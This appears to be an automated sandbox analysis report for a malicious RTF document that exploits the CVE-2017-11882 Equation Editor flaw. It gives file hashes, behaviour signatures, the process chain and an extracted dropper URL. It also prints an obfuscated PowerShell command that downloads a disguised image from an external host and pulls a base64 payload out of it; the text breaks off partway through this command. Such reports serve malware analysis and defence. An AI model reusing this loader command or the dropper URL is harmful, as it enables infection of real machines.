2af5c37cecd6405e5217b76fe88e9b7aa109902c453a94819e91aff17d424973

General

Target

SecuriteInfo.com.Exploit.CVE-2017-11882.123.8441.24466.rtf
Size

87KB
MD5

9b11ffc668d7fde9f491c1366d298403
SHA1

1ac90b45512867aee829209f01cfc89b05620451
SHA256

2af5c37cecd6405e5217b76fe88e9b7aa109902c453a94819e91aff17d424973
SHA512

36fca916149ce3fb76802c2fac0802317d7582b2cdd9f3228fcc4a67a6f2a96986262b6118cfee68aedb132890a5bc0f2d8484901fc575fa5c7dbfb7f070f9e3
SSDEEP

384:bbNf/eadHcAE0Ktcxb8Zg7VbtfLS+8dIymjP87erNm61wtmAZmID0OpBrQ67Wc:bb1eAcnVjSVRfLSNmEeA64S6ic

Score

10^/10

discovery execution

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

ps1.dropper

https://ia803104.us.archive.org/27/items/vbs_20240726_20240726/vbs.jpg

exe.dropper

https://ia803104.us.archive.org/27/items/vbs_20240726_20240726/vbs.jpg

Signatures

Blocklisted process makes network request 3 IoCs

flow	pid	Process
4	2680	EQNEDT32.EXE
6	2544	powershell.exe
7	2544	powershell.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs

Run Powershell and hide display window.

execution

PowerShell

T1059.001

pid	Process
2552	powershell.exe
2544	powershell.exe

Drops file in System32 directory 2 IoCs

description	ioc	Process
File opened for modification	C:\Windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe
File opened for modification	C:\Windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe

Drops file in Windows directory 1 IoCs

description	ioc	Process
File opened for modification	C:\Windows\Debug\WIA\wiatrace.log	WINWORD.EXE

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

System Location Discovery: System Language Discovery 1 TTPs 5 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	WINWORD.EXE
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	EQNEDT32.EXE
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	WScript.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe

Office loads VBA resources, possible macro or embedded object present

Launches Equation Editor 1 TTPs 1 IoCs

Equation Editor is an old Office component often targeted by exploits such as CVE-2017-11882.

exploit

Exploitation for Client Execution

T1203

pid	Process
2680	EQNEDT32.EXE

Suspicious behavior: AddClipboardFormatListener 1 IoCs

pid	Process
3068	WINWORD.EXE

Suspicious behavior: EnumeratesProcesses 2 IoCs

pid	Process
2552	powershell.exe
2544	powershell.exe

Suspicious use of AdjustPrivilegeToken 2 IoCs

description	pid	Process
Token: SeDebugPrivilege	2552	powershell.exe
Token: SeDebugPrivilege	2544	powershell.exe

Suspicious use of SetWindowsHookEx 2 IoCs

pid	Process
3068	WINWORD.EXE
3068	WINWORD.EXE

Suspicious use of WriteProcessMemory 16 IoCs

description	pid	Process	procid_target
PID 2680 wrote to memory of 2424	2680	EQNEDT32.EXE	32
PID 2680 wrote to memory of 2424	2680	EQNEDT32.EXE	32
PID 2680 wrote to memory of 2424	2680	EQNEDT32.EXE	32
PID 2680 wrote to memory of 2424	2680	EQNEDT32.EXE	32
PID 2424 wrote to memory of 2552	2424	WScript.exe	34
PID 2424 wrote to memory of 2552	2424	WScript.exe	34
PID 2424 wrote to memory of 2552	2424	WScript.exe	34
PID 2424 wrote to memory of 2552	2424	WScript.exe	34
PID 2552 wrote to memory of 2544	2552	powershell.exe	36
PID 2552 wrote to memory of 2544	2552	powershell.exe	36
PID 2552 wrote to memory of 2544	2552	powershell.exe	36
PID 2552 wrote to memory of 2544	2552	powershell.exe	36
PID 3068 wrote to memory of 1732	3068	WINWORD.EXE	37
PID 3068 wrote to memory of 1732	3068	WINWORD.EXE	37
PID 3068 wrote to memory of 1732	3068	WINWORD.EXE	37
PID 3068 wrote to memory of 1732	3068	WINWORD.EXE	37

C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE
"C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\SecuriteInfo.com.Exploit.CVE-2017-11882.123.8441.24466.rtf"
1⤵
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:3068
- C:\Windows\splwow64.exe
  C:\Windows\splwow64.exe 12288
  2⤵
  PID:1732

C:\Program Files (x86)\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
"C:\Program Files (x86)\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
1⤵
- Blocklisted process makes network request
- System Location Discovery: System Language Discovery
- Launches Equation Editor
- Suspicious use of WriteProcessMemory
PID:2680
- C:\Windows\SysWOW64\WScript.exe
  "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\butterfoodgoodforhealthbetterfood.vBS"
  2⤵
  - System Location Discovery: System Language Discovery
  - Suspicious use of WriteProcessMemory
  PID:2424
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'J㌔ ䷗ ⯍ ⍠ ⥥Bp㌔ ䷗ ⯍ ⍠ ⥥G0㌔ ䷗ ⯍ ⍠ ⥥YQBn㌔ ䷗ ⯍ ⍠ ⥥GU㌔ ䷗ ⯍ ⍠ ⥥VQBy㌔ ䷗ ⯍ ⍠ ⥥Gw㌔ ䷗ ⯍ ⍠ ⥥I㌔ ䷗ ⯍ ⍠ ⥥㌔ ䷗ ⯍ ⍠ ⥥9㌔ ䷗ ⯍ ⍠ ⥥C㌔ ䷗ ⯍ ⍠ ⥥㌔ ䷗ ⯍ ⍠ ⥥JwBo㌔ ䷗ ⯍ ⍠ ⥥HQ㌔ ䷗ ⯍ ⍠ ⥥d㌔ ䷗ ⯍ ⍠ ⥥Bw㌔ ䷗ ⯍ ⍠ ⥥HM㌔ ䷗ ⯍ ⍠ ⥥Og㌔ ䷗ ⯍ ⍠ ⥥v㌔ ䷗ ⯍ ⍠ ⥥C8㌔ ䷗ ⯍ ⍠ ⥥aQBh㌔ ䷗ ⯍ ⍠ ⥥Dg㌔ ䷗ ⯍ ⍠ ⥥M㌔ ䷗ ⯍ ⍠ ⥥㌔ ䷗ ⯍ ⍠ ⥥z㌔ ䷗ ⯍ ⍠ ⥥DE㌔ ䷗ ⯍ ⍠ ⥥M㌔ ䷗ ⯍ ⍠ ⥥㌔ ䷗ ⯍ ⍠ ⥥0㌔ ䷗ ⯍ ⍠ ⥥C4㌔ ䷗ ⯍ ⍠ ⥥dQBz㌔ ䷗ ⯍ ⍠ ⥥C4㌔ ䷗ ⯍ ⍠ ⥥YQBy㌔ ䷗ ⯍ ⍠ ⥥GM㌔ ䷗ ⯍ ⍠ ⥥a㌔ ䷗ ⯍ ⍠ ⥥Bp㌔ ䷗ ⯍ ⍠ ⥥HY㌔ ䷗ ⯍ ⍠ ⥥ZQ㌔ ䷗ ⯍ ⍠ ⥥u㌔ ䷗ ⯍ ⍠ ⥥G8㌔ ䷗ ⯍ ⍠ ⥥cgBn㌔ ䷗ ⯍ ⍠ ⥥C8㌔ ䷗ ⯍ ⍠ ⥥Mg㌔ ䷗ ⯍ ⍠ ⥥3㌔ ䷗ ⯍ ⍠ ⥥C8㌔ ䷗ ⯍ ⍠ ⥥aQB0㌔ ䷗ ⯍ ⍠ ⥥GU㌔ ䷗ ⯍ ⍠ ⥥bQBz㌔ ䷗ ⯍ ⍠ ⥥C8㌔ ䷗ ⯍ ⍠ ⥥dgBi㌔ ䷗ ⯍ ⍠ ⥥HM㌔ ䷗ ⯍ ⍠ ⥥Xw㌔ ䷗ ⯍ ⍠ ⥥y㌔ ䷗ ⯍ ⍠ ⥥D㌔ ䷗ ⯍ ⍠ ⥥㌔ ䷗ ⯍ ⍠ ⥥Mg㌔ ䷗ ⯍ ⍠ ⥥0㌔ ䷗ ⯍ ⍠ ⥥D㌔ ䷗ ⯍ ⍠ ⥥㌔ ䷗ ⯍ ⍠ ⥥Nw㌔ ䷗ ⯍ ⍠ ⥥y㌔ ䷗ ⯍ ⍠ ⥥DY㌔ ䷗ ⯍ ⍠ ⥥Xw㌔ ䷗ ⯍ ⍠ ⥥y㌔ ䷗ ⯍ ⍠ ⥥D㌔ ䷗ ⯍ ⍠ ⥥㌔ ䷗ ⯍ ⍠ ⥥Mg㌔ ䷗ ⯍ ⍠ ⥥0㌔ ䷗ ⯍ ⍠ ⥥D㌔ ䷗ ⯍ ⍠ ⥥㌔ ䷗ ⯍ ⍠ ⥥Nw㌔ ䷗ ⯍ ⍠ ⥥y㌔ ䷗ ⯍ ⍠ ⥥DY㌔ ䷗ ⯍ ⍠ ⥥LwB2㌔ ䷗ ⯍ ⍠ ⥥GI㌔ ䷗ ⯍ ⍠ ⥥cw㌔ ䷗ ⯍ ⍠ ⥥u㌔ ䷗ ⯍ ⍠ ⥥Go㌔ ䷗ ⯍ ⍠ ⥥c㌔ ䷗ ⯍ ⍠ ⥥Bn㌔ ䷗ ⯍ ⍠ ⥥Cc㌔ ䷗ ⯍ ⍠ ⥥Ow㌔ ䷗ ⯍ ⍠ ⥥k㌔ ䷗ ⯍ ⍠ ⥥Hc㌔ ䷗ ⯍ ⍠ ⥥ZQBi㌔ ䷗ ⯍ ⍠ ⥥EM㌔ ䷗ ⯍ ⍠ ⥥b㌔ ䷗ ⯍ ⍠ ⥥Bp㌔ ䷗ ⯍ ⍠ ⥥GU㌔ ䷗ ⯍ ⍠ ⥥bgB0㌔ ䷗ ⯍ ⍠ ⥥C㌔ ䷗ ⯍ ⍠ ⥥㌔ ䷗ ⯍ ⍠ ⥥PQ㌔ ䷗ ⯍ ⍠ ⥥g㌔ ䷗ ⯍ ⍠ ⥥E4㌔ ䷗ ⯍ ⍠ ⥥ZQB3㌔ ䷗ ⯍ ⍠ ⥥C0㌔ ䷗ ⯍ ⍠ ⥥TwBi㌔ ䷗ ⯍ ⍠ ⥥Go㌔ ䷗ ⯍ ⍠ ⥥ZQBj㌔ ䷗ ⯍ ⍠ ⥥HQ㌔ ䷗ ⯍ ⍠ ⥥I㌔ ䷗ ⯍ ⍠ ⥥BT㌔ ䷗ ⯍ ⍠ ⥥Hk㌔ ䷗ ⯍ ⍠ ⥥cwB0㌔ ䷗ ⯍ ⍠ ⥥GU㌔ ䷗ ⯍ ⍠ ⥥bQ㌔ ䷗ ⯍ ⍠ ⥥u㌔ ䷗ ⯍ ⍠ ⥥E4㌔ ䷗ ⯍ ⍠ ⥥ZQB0㌔ ䷗ ⯍ ⍠ ⥥C4㌔ ䷗ ⯍ ⍠ ⥥VwBl㌔ ䷗ ⯍ ⍠ ⥥GI㌔ ䷗ ⯍ ⍠ ⥥QwBs㌔ ䷗ ⯍ ⍠ ⥥Gk㌔ ䷗ ⯍ ⍠ ⥥ZQBu㌔ ䷗ ⯍ ⍠ ⥥HQ㌔ ䷗ ⯍ ⍠ ⥥Ow㌔ ䷗ ⯍ ⍠ ⥥k㌔ ䷗ ⯍ ⍠ ⥥Gk㌔ ䷗ ⯍ ⍠ ⥥bQBh㌔ ䷗ ⯍ ⍠ ⥥Gc㌔ ䷗ ⯍ ⍠ ⥥ZQBC㌔ ䷗ ⯍ ⍠ ⥥Hk㌔ ䷗ ⯍ ⍠ ⥥d㌔ ䷗ ⯍ ⍠ ⥥Bl㌔ ䷗ ⯍ ⍠ ⥥HM㌔ ䷗ ⯍ ⍠ ⥥I㌔ ䷗ ⯍ ⍠ ⥥㌔ ䷗ ⯍ ⍠ ⥥9㌔ ䷗ ⯍ ⍠ ⥥C㌔ ䷗ ⯍ ⍠ ⥥㌔ ䷗ ⯍ ⍠ ⥥J㌔ ䷗ ⯍ ⍠ ⥥B3㌔ ䷗ ⯍ ⍠ ⥥GU㌔ ䷗ ⯍ ⍠ ⥥YgBD㌔ ䷗ ⯍ ⍠ ⥥Gw㌔ ䷗ ⯍ ⍠ ⥥aQBl㌔ ䷗ ⯍ ⍠ ⥥G4㌔ ䷗ ⯍ ⍠ ⥥d㌔ ䷗ ⯍ ⍠ ⥥㌔ ䷗ ⯍ ⍠ ⥥u㌔ ䷗ ⯍ ⍠ ⥥EQ㌔ ䷗ ⯍ ⍠ ⥥bwB3㌔ ䷗ ⯍ ⍠ ⥥G4㌔ ䷗ ⯍ ⍠ ⥥b㌔ ䷗ ⯍ ⍠ ⥥Bv㌔ ䷗ ⯍ ⍠ ⥥GE㌔ ䷗ ⯍ ⍠ ⥥Z㌔ ䷗ ⯍ ⍠ ⥥BE㌔ ䷗ ⯍ ⍠ ⥥GE㌔ ䷗ ⯍ ⍠ ⥥d㌔ ䷗ ⯍ ⍠ ⥥Bh㌔ ䷗ ⯍ ⍠ ⥥Cg㌔ ䷗ ⯍ ⍠ ⥥J㌔ ䷗ ⯍ ⍠ ⥥Bp㌔ ䷗ ⯍ ⍠ ⥥G0㌔ ䷗ ⯍ ⍠ ⥥YQBn㌔ ䷗ ⯍ ⍠ ⥥GU㌔ ䷗ ⯍ ⍠ ⥥VQBy㌔ ䷗ ⯍ ⍠ ⥥Gw㌔ ䷗ ⯍ ⍠ ⥥KQ㌔ ䷗ ⯍ ⍠ ⥥7㌔ ䷗ ⯍ ⍠ ⥥CQ㌔ ䷗ ⯍ ⍠ ⥥aQBt㌔ ䷗ ⯍ ⍠ ⥥GE㌔ ䷗ ⯍ ⍠ ⥥ZwBl㌔ ䷗ ⯍ ⍠ ⥥FQ㌔ ䷗ ⯍ ⍠ ⥥ZQB4㌔ ䷗ ⯍ ⍠ ⥥HQ㌔ ䷗ ⯍ ⍠ ⥥I㌔ ䷗ ⯍ ⍠ ⥥㌔ ䷗ ⯍ ⍠ ⥥9㌔ ䷗ ⯍ ⍠ ⥥C㌔ ䷗ ⯍ ⍠ ⥥㌔ ䷗ ⯍ ⍠ ⥥WwBT㌔ ䷗ ⯍ ⍠ ⥥Hk㌔ ䷗ ⯍ ⍠ ⥥cwB0㌔ ䷗ ⯍ ⍠ ⥥GU㌔ ䷗ ⯍ ⍠ ⥥bQ㌔ ䷗ ⯍ ⍠ ⥥u㌔ ䷗ ⯍ ⍠ ⥥FQ㌔ ䷗ ⯍ ⍠ ⥥ZQB4㌔ ䷗ ⯍ ⍠ ⥥HQ㌔ ䷗ ⯍ ⍠ ⥥LgBF㌔ ䷗ ⯍ ⍠ ⥥G4㌔ ䷗ ⯍ ⍠ ⥥YwBv㌔ ䷗ ⯍ ⍠ ⥥GQ㌔ ䷗ ⯍ ⍠ ⥥aQBu㌔ ䷗ ⯍ ⍠ ⥥Gc㌔ ䷗ ⯍ ⍠ ⥥XQ㌔ ䷗ ⯍ ⍠ ⥥6㌔ ䷗ ⯍ ⍠ ⥥Do㌔ ䷗ ⯍ ⍠ ⥥VQBU㌔ ䷗ ⯍ ⍠ ⥥EY㌔ ䷗ ⯍ ⍠ ⥥O㌔ ䷗ ⯍ ⍠ ⥥㌔ ䷗ ⯍ ⍠ ⥥u㌔ ䷗ ⯍ ⍠ ⥥Ec㌔ ䷗ ⯍ ⍠ ⥥ZQB0㌔ ䷗ ⯍ ⍠ ⥥FM㌔ ䷗ ⯍ ⍠ ⥥d㌔ ䷗ ⯍ ⍠ ⥥By㌔ ䷗ ⯍ ⍠ ⥥Gk㌔ ䷗ ⯍ ⍠ ⥥bgBn㌔ ䷗ ⯍ ⍠ ⥥Cg㌔ ䷗ ⯍ ⍠ ⥥J㌔ ䷗ ⯍ ⍠ ⥥Bp㌔ ䷗ ⯍ ⍠ ⥥G0㌔ ䷗ ⯍ ⍠ ⥥YQBn㌔ ䷗ ⯍ ⍠ ⥥GU㌔ ䷗ ⯍ ⍠ ⥥QgB5㌔ ䷗ ⯍ ⍠ ⥥HQ㌔ ䷗ ⯍ ⍠ ⥥ZQBz㌔ ䷗ ⯍ ⍠ ⥥Ck㌔ ䷗ ⯍ ⍠ ⥥Ow㌔ ䷗ ⯍ ⍠ ⥥k㌔ ䷗ ⯍ ⍠ ⥥HM㌔ ䷗ ⯍ ⍠ ⥥d㌔ ䷗ ⯍ ⍠ ⥥Bh㌔ ䷗ ⯍ ⍠ ⥥HI㌔ ䷗ ⯍ ⍠ ⥥d㌔ ䷗ ⯍ ⍠ ⥥BG㌔ ䷗ ⯍ ⍠ ⥥Gw㌔ ䷗ ⯍ ⍠ ⥥YQBn㌔ ䷗ ⯍ ⍠ ⥥C㌔ ䷗ ⯍ ⍠ ⥥㌔ ䷗ ⯍ ⍠ ⥥PQ㌔ ䷗ ⯍ ⍠ ⥥g㌔ ䷗ ⯍ ⍠ ⥥Cc㌔ ䷗ ⯍ ⍠ ⥥P㌔ ䷗ ⯍ ⍠ ⥥㌔ ䷗ ⯍ ⍠ ⥥8㌔ ䷗ ⯍ ⍠ ⥥EI㌔ ䷗ ⯍ ⍠ ⥥QQBT㌔ ䷗ ⯍ ⍠ ⥥EU㌔ ䷗ ⯍ ⍠ ⥥Ng㌔ ䷗ ⯍ ⍠ ⥥0㌔ ䷗ ⯍ ⍠ ⥥F8㌔ ䷗ ⯍ ⍠ ⥥UwBU㌔ ䷗ ⯍ ⍠ ⥥EE㌔ ䷗ ⯍ ⍠ ⥥UgBU㌔ ䷗ ⯍ ⍠ ⥥D4㌔ ䷗ ⯍ ⍠ ⥥Pg㌔ ䷗ ⯍ ⍠ ⥥n㌔ ䷗ ⯍ ⍠ ⥥Ds㌔ ䷗ ⯍ ⍠ ⥥J㌔ ䷗ ⯍ ⍠ ⥥Bl㌔ ䷗ ⯍ ⍠ ⥥G4㌔ ䷗ ⯍ ⍠ ⥥Z㌔ ䷗ ⯍ ⍠ ⥥BG㌔ ䷗ ⯍ ⍠ ⥥Gw㌔ ䷗ ⯍ ⍠ ⥥YQBn㌔ ䷗ ⯍ ⍠ ⥥C㌔ ䷗ ⯍ ⍠ ⥥㌔ ䷗ ⯍ ⍠ ⥥PQ㌔ ䷗ ⯍ ⍠ ⥥g㌔ ䷗ ⯍ ⍠ ⥥Cc㌔ ䷗ ⯍ ⍠ ⥥P㌔ ䷗ ⯍ ⍠ ⥥㌔ ䷗ ⯍ ⍠ ⥥8㌔ ䷗ ⯍ ⍠ ⥥EI㌔ ䷗ ⯍ ⍠ ⥥QQBT㌔ ䷗ ⯍ ⍠ ⥥EU㌔ ䷗ ⯍ ⍠ ⥥Ng㌔ ䷗ ⯍ ⍠ ⥥0㌔ ䷗ ⯍ ⍠ ⥥F8㌔ ䷗ ⯍ ⍠ ⥥RQBO㌔ ䷗ ⯍ ⍠ ⥥EQ㌔ ䷗ ⯍ ⍠ ⥥Pg㌔ ䷗ ⯍ ⍠ ⥥+㌔ ䷗ ⯍ ⍠ ⥥Cc㌔ ䷗ ⯍ ⍠ ⥥Ow㌔ ䷗ ⯍ ⍠ ⥥k㌔ ䷗ ⯍ ⍠ ⥥HM㌔ ䷗ ⯍ ⍠ ⥥d㌔ ䷗ ⯍ ⍠ ⥥Bh㌔ ䷗ ⯍ ⍠ ⥥HI㌔ ䷗ ⯍ ⍠ ⥥d㌔ ䷗ ⯍ ⍠ ⥥BJ㌔ ䷗ ⯍ ⍠ ⥥G4㌔ ䷗ ⯍ ⍠ ⥥Z㌔ ䷗ ⯍ ⍠ ⥥Bl㌔ ䷗ ⯍ ⍠ ⥥Hg㌔ ䷗ ⯍ ⍠ ⥥I㌔ ䷗ ⯍ ⍠ ⥥㌔ ䷗ ⯍ ⍠ ⥥9㌔ ䷗ ⯍ ⍠ ⥥C㌔ ䷗ ⯍ ⍠ ⥥㌔ ䷗ ⯍ ⍠ ⥥J㌔ ䷗ ⯍ ⍠ ⥥Bp㌔ ䷗ ⯍ ⍠ ⥥G0㌔ ䷗ ⯍ ⍠ ⥥YQBn㌔ ䷗ ⯍ ⍠ ⥥GU㌔ ䷗ ⯍ ⍠ ⥥V㌔ ䷗ ⯍ ⍠ ⥥Bl㌔ ䷗ ⯍ ⍠ ⥥Hg㌔ ䷗ ⯍ ⍠ ⥥d㌔ ䷗ ⯍ ⍠ ⥥㌔ ䷗ ⯍ ⍠ ⥥u㌔ ䷗ ⯍ ⍠ ⥥Ek㌔ ䷗ ⯍ ⍠ ⥥bgBk㌔ ䷗ ⯍ ⍠ ⥥GU㌔ ䷗ ⯍ ⍠ ⥥e㌔ ䷗ ⯍ ⍠ ⥥BP㌔ ䷗ ⯍ ⍠ ⥥GY㌔ ䷗ ⯍ ⍠ ⥥K㌔ ䷗ ⯍ ⍠ ⥥㌔ ䷗ ⯍ ⍠ ⥥k㌔ ䷗ ⯍ ⍠ ⥥HM㌔ ䷗ ⯍ ⍠ ⥥d㌔ ䷗ ⯍ ⍠ ⥥Bh㌔ ䷗ ⯍ ⍠ ⥥HI㌔ ䷗ ⯍ ⍠ ⥥d㌔ ䷗ ⯍ ⍠ ⥥BG㌔ ䷗ ⯍ ⍠ ⥥Gw㌔ ䷗ ⯍ ⍠ ⥥YQBn㌔ ䷗ ⯍ ⍠ ⥥Ck㌔ ䷗ ⯍ ⍠ ⥥Ow㌔ ䷗ ⯍ ⍠ ⥥k㌔ ䷗ ⯍ ⍠ ⥥GU㌔ ䷗ ⯍ ⍠ ⥥bgBk㌔ ䷗ ⯍ ⍠ ⥥Ek㌔ ䷗ ⯍ ⍠ ⥥bgBk㌔ ䷗ ⯍ ⍠ ⥥GU㌔ ䷗ ⯍ ⍠ ⥥e㌔ ䷗ ⯍ ⍠ ⥥㌔ ䷗ ⯍ ⍠ ⥥g㌔ ䷗ ⯍ ⍠ ⥥D0㌔ ䷗ ⯍ ⍠ ⥥I㌔ ䷗ ⯍ ⍠ ⥥㌔ ䷗ ⯍ ⍠ ⥥k㌔ ䷗ ⯍ ⍠ ⥥Gk㌔ ䷗ ⯍ ⍠ ⥥bQBh㌔ ䷗ ⯍ ⍠ ⥥Gc㌔ ䷗ ⯍ ⍠ ⥥ZQBU㌔ ䷗ ⯍ ⍠ ⥥GU㌔ ䷗ ⯍ ⍠ ⥥e㌔ ䷗ ⯍ ⍠ ⥥B0㌔ ䷗ ⯍ ⍠ ⥥C4㌔ ䷗ ⯍ ⍠ ⥥SQBu㌔ ䷗ ⯍ ⍠ ⥥GQ㌔ ䷗ ⯍ ⍠ ⥥ZQB4㌔ ䷗ ⯍ ⍠ ⥥E8㌔ ䷗ ⯍ ⍠ ⥥Zg㌔ ䷗ ⯍ ⍠ ⥥o㌔ ䷗ ⯍ ⍠ ⥥CQ㌔ ䷗ ⯍ ⍠ ⥥ZQBu㌔ ䷗ ⯍ ⍠ ⥥GQ㌔ ䷗ ⯍ ⍠ ⥥RgBs㌔ ䷗ ⯍ ⍠ ⥥GE㌔ ䷗ ⯍ ⍠ ⥥Zw㌔ ䷗ ⯍ ⍠ ⥥p㌔ ䷗ ⯍ ⍠ ⥥Ds㌔ ䷗ ⯍ ⍠ ⥥J㌔ ䷗ ⯍ ⍠ ⥥Bz㌔ ䷗ ⯍ ⍠ ⥥HQ㌔ ䷗ ⯍ ⍠ ⥥YQBy㌔ ䷗ ⯍ ⍠ ⥥HQ㌔ ䷗ ⯍ ⍠ ⥥SQBu㌔ ䷗ ⯍ ⍠ ⥥GQ㌔ ䷗ ⯍ ⍠ ⥥ZQB4㌔ ䷗ ⯍ ⍠ ⥥C㌔ ䷗ ⯍ ⍠ ⥥㌔ ䷗ ⯍ ⍠ ⥥LQBn㌔ ䷗ ⯍ ⍠ ⥥GU㌔ ䷗ ⯍ ⍠ ⥥I㌔ ䷗ ⯍ ⍠ ⥥㌔ ䷗ ⯍ ⍠ ⥥w㌔ ䷗ ⯍ ⍠ ⥥C㌔ ䷗ ⯍ ⍠ ⥥㌔ ䷗ ⯍ ⍠ ⥥LQBh㌔ ䷗ ⯍ ⍠ ⥥G4㌔ ䷗ ⯍ ⍠ ⥥Z㌔ ䷗ ⯍ ⍠ ⥥㌔ ䷗ ⯍ ⍠ ⥥g㌔ ䷗ ⯍ ⍠ ⥥CQ㌔ ䷗ ⯍ ⍠ ⥥ZQBu㌔ ䷗ ⯍ ⍠ ⥥GQ㌔ ䷗ ⯍ ⍠ ⥥SQBu㌔ ䷗ ⯍ ⍠ ⥥GQ㌔ ䷗ ⯍ ⍠ ⥥ZQB4㌔ ䷗ ⯍ ⍠ ⥥C㌔ ䷗ ⯍ ⍠ ⥥㌔ ䷗ ⯍ ⍠ ⥥LQBn㌔ ䷗ ⯍ ⍠ ⥥HQ㌔ ䷗ ⯍ ⍠ ⥥I㌔ ䷗ ⯍ ⍠ ⥥㌔ ䷗ ⯍ ⍠ ⥥k㌔ ䷗ ⯍ ⍠ ⥥HM㌔ ䷗ ⯍ ⍠ ⥥d㌔ ䷗ ⯍ ⍠ ⥥Bh㌔ ䷗ ⯍ ⍠ ⥥HI㌔ ䷗ ⯍ ⍠ ⥥d㌔ ䷗ ⯍ ⍠ ⥥BJ㌔ ䷗ ⯍ ⍠ ⥥G4㌔ ䷗ ⯍ ⍠ ⥥Z㌔ ䷗ ⯍ ⍠ ⥥Bl㌔ ䷗ ⯍ ⍠ ⥥Hg㌔ ䷗ ⯍ ⍠ ⥥Ow㌔ ䷗ ⯍ ⍠ ⥥k㌔ ䷗ ⯍ ⍠ ⥥HM㌔ ䷗ ⯍ ⍠ ⥥d㌔ ䷗ ⯍ ⍠ ⥥Bh㌔ ䷗ ⯍ ⍠ ⥥HI㌔ ䷗ ⯍ ⍠ ⥥d㌔ ䷗ ⯍ ⍠ ⥥BJ㌔ ䷗ ⯍ ⍠ ⥥G4㌔ ䷗ ⯍ ⍠ ⥥Z㌔ ䷗ ⯍ ⍠ ⥥Bl㌔ ䷗ ⯍ ⍠ ⥥Hg㌔ ䷗ ⯍ ⍠ ⥥I㌔ ䷗ ⯍ ⍠ ⥥㌔ ䷗ ⯍ ⍠ ⥥r㌔ ䷗ ⯍ ⍠ ⥥D0㌔ ䷗ ⯍ ⍠ ⥥I㌔ ䷗ ⯍ ⍠ ⥥㌔ ䷗ ⯍ ⍠ ⥥k㌔ ䷗ ⯍ ⍠ ⥥HM㌔ ䷗ ⯍ ⍠ ⥥d㌔ ䷗ ⯍ ⍠ ⥥Bh㌔ ䷗ ⯍ ⍠ ⥥HI㌔ ䷗ ⯍ ⍠ ⥥d㌔ ䷗ ⯍ ⍠ ⥥BG㌔ ䷗ ⯍ ⍠ ⥥Gw㌔ ䷗ ⯍ ⍠ ⥥YQBn㌔ ䷗ ⯍ ⍠ ⥥C4㌔ ䷗ ⯍ ⍠ ⥥T㌔ ䷗ ⯍ ⍠ ⥥Bl㌔ ䷗ ⯍ ⍠ ⥥G4㌔ ䷗ ⯍ ⍠ ⥥ZwB0㌔ ䷗ ⯍ ⍠ ⥥Gg㌔ ䷗ ⯍ ⍠ ⥥Ow㌔ ䷗ ⯍ ⍠ ⥥k㌔ ䷗ ⯍ ⍠ ⥥GI㌔ ䷗ ⯍ ⍠ ⥥YQBz㌔ ䷗ ⯍ ⍠ ⥥GU㌔ ䷗ ⯍ ⍠ ⥥Ng㌔ ䷗ ⯍ ⍠ ⥥0㌔ ䷗ ⯍ ⍠ ⥥Ew㌔ ䷗ ⯍ ⍠ ⥥ZQBu㌔ ䷗ ⯍ ⍠ ⥥Gc㌔ ䷗ ⯍ ⍠ ⥥d㌔ ䷗ ⯍ ⍠ ⥥Bo㌔ ䷗ ⯍ ⍠ ⥥C㌔ ䷗ ⯍ ⍠ ⥥㌔ ䷗ ⯍ ⍠ ⥥PQ㌔ ䷗ ⯍ ⍠ ⥥g㌔ ䷗ ⯍ ⍠ ⥥CQ㌔ ䷗ ⯍ ⍠ ⥥ZQBu㌔ ䷗ ⯍ ⍠ ⥥GQ㌔ ䷗ ⯍ ⍠ ⥥SQBu㌔ ䷗ ⯍ ⍠ ⥥GQ㌔ ䷗ ⯍ ⍠ ⥥ZQB4㌔ ䷗ ⯍ ⍠ ⥥C㌔ ䷗ ⯍ ⍠ ⥥㌔ ䷗ ⯍ ⍠ ⥥LQ㌔ ䷗ ⯍ ⍠ ⥥g㌔ ䷗ ⯍ ⍠ ⥥CQ㌔ ䷗ ⯍ ⍠ ⥥cwB0㌔ ䷗ ⯍ ⍠ ⥥GE㌔ ䷗ ⯍ ⍠ ⥥cgB0㌔ ䷗ ⯍ ⍠ ⥥Ek㌔ ䷗ ⯍ ⍠ ⥥bgBk㌔ ䷗ ⯍ ⍠ ⥥GU㌔ ䷗ ⯍ ⍠ ⥥e㌔ ䷗ ⯍ ⍠ ⥥㌔ ䷗ ⯍ ⍠ ⥥7㌔ ䷗ ⯍ ⍠ ⥥CQ㌔ ䷗ ⯍ ⍠ ⥥YgBh㌔ ䷗ ⯍ ⍠ ⥥HM㌔ ䷗ ⯍ ⍠ ⥥ZQ㌔ ䷗ ⯍ ⍠ ⥥2㌔ ䷗ ⯍ ⍠ ⥥DQ㌔ ䷗ ⯍ ⍠ ⥥QwBv㌔ ䷗ ⯍ ⍠ ⥥G0㌔ ䷗ ⯍ ⍠ ⥥bQBh㌔ ䷗ ⯍ ⍠ ⥥G4㌔ ䷗ ⯍ ⍠ ⥥Z㌔ ䷗ ⯍ ⍠ ⥥㌔ ䷗ ⯍ ⍠ 